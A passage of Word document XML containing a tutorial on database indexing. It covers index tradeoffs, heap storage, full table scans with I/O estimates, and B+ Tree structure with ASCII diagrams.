    <w:p w14:paraId="5E079040" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Index says: "Row is at page 4721, offset 3."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335C462" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Read exactly that row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BBDB57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → O(log n): ~24 comparisons for 10M rows. Time: 0.1–1ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DA561F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cost — nothing is free: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289"/>
        <w:gridCol w:w="6061"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="36221B2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26C1F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Benefit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EC37B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="47BB1AF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799A49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Reads are faster (avoid full scan)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20D5E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Writes are slower (must update index on every INSERT/UPDATE/DELETE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="5995FAB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0769D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Point lookups: O(log n) instead of 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739E8A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Additional storage (index can be 10–30% of table size)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="38EDABE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BFE524" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Range queries are efficient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C68BCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Maintenance overhead (rebalancing, vacuuming, fragmentation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="0A68A81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E9CAB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Sorts can be avoided (pre-sorted index)</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12A59F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Memory consumption (indexes should fit in RAM for speed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C065B57" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEB0DA5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677424B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>No indexes:  Writes are fast (just append). Reads are slow (full scan).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836F870" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Many indexes: Reads are fast (index lookup). Writes are slow (update every index).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE59537" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This is the classic read optimization vs. write optimization tradeoff that drives all indexing decisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759A1F1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="769C3D35">
          <v:rect id="_x0000_i5321" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A8AE52" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. How Data Is Stored Without Indexes (Heap / Table Scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46345356" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Heap Storage (Default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DD206" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Without any index, a table is stored as an unordered collection of pages (heap):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701F0A77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E172B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page 0: [row1, row5, row8, row12, ...]   (no particular order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA9724" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page 1: [row3, row7, row2, row15, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588536FD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page 2: [row4, row11, row6, row9, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B6BF1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88C2D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page 5000: [row999998, row999999, row1000000, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA74DC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Rows are stored wherever there's free space. No relationship between the data value and its physical location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EBFED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Full Table Scan (Sequential Scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5C6A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1FF09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731A901" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT * FROM orders WHERE customer_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D4FB3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="405752AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BB014" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read page 0 → check every row → any matches? → keep matching rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EEB6B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read page 1 → check every row → any matches? → keep matching rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A6754" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read page 2 → check every row → any matches? → keep matching rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AB3DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478327E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Read page 5000 → check every row → done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E10F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="03FCF9D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>I/O: 5000 pages × 8 KB = 40 MB of data read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08A1F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Time: 40 MB / 500 MB/s (SSD sequential) ≈ 80ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A4ECF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      40 MB / 200 MB/s (HDD) ≈ 200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE1905" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When full scans are actually fine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014282AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Table is small (fits in memory / few pages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9BE09D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Query needs most rows anyway (SELECT * with no WHERE or matching 50%+ of rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04E8F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>No suitable index exists and can't be created (ad-hoc analytics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A0966" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When full scans are catastrophic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F75457" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Table has billions of rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B4F9E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Query needs 1 row out of 1 billion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA3B36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>High concurrency (many queries simultaneously scanning = I/O saturation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241E6627" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="62E50D1E">
          <v:rect id="_x0000_i5322" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41B059" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. B-Tree Index — The Dominant Index Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C17196E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 What a B-Tree Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D37554C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>A B-Tree (balanced tree, specifically B+ Tree in most databases) is a self-balancing, sorted tree structure optimized for systems that read and write large blocks of data (disk pages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED01144" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why B-Tree and not binary tree?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F330A35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Binary tree: each node has 2 children. Tree height for 1M keys: log₂(1,000,000) = 20 levels. Each level = 1 random disk I/O. 20 I/Os per lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B8F69" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>B-Tree (fanout 500): each node has ~500 children. Tree height: log₅₀₀(1,000,000) ≈ 3 levels. 3 I/Os per lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70598828" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B-Trees minimize disk I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> by maximizing the fanout (branching factor) at each node, making the tree extremely shallow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C95EA4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 B+ Tree Structure (What Databases Actually Use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09409A04" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61362A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                          [Root Node]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4267B144" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                    /    |    |    |    \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F084689" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                [Internal Nodes (non-leaf)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86BE87" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">              /  |  \  /  |  \  /  |  \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4802D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">          [Leaf] [Leaf] [Leaf] [Leaf] [Leaf] [Leaf]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A16B4A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            ↕      ↕      ↕      ↕      ↕      ↕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DBB6B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">          (linked list connecting all leaves for range scans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BC0ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key properties of B+ Tree:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169521C3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All data (or pointers to data) is in leaf nodes.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Internal nodes only store keys and child pointers (routing information).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723CEB43" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leaf nodes are linked</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (doubly-linked list). Enables efficient range scans — once you find the start, follow the links.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A56BD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All leaves are at the same depth.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> The tree is perfectly balanced. Every lookup takes the same number of I/Os.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E4BA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nodes are sized to match disk pages</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> (typically 4–16 KB). One node = one disk read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17283775" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 B+ Tree Node Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4406B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal (non-leaf) node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B883C8F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488252D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4606E00D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ [ptr₀] key₁ [ptr₁] key₂ [ptr₂] ... key</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₙ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> [ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>ₙ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">]    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE2F1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└─────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
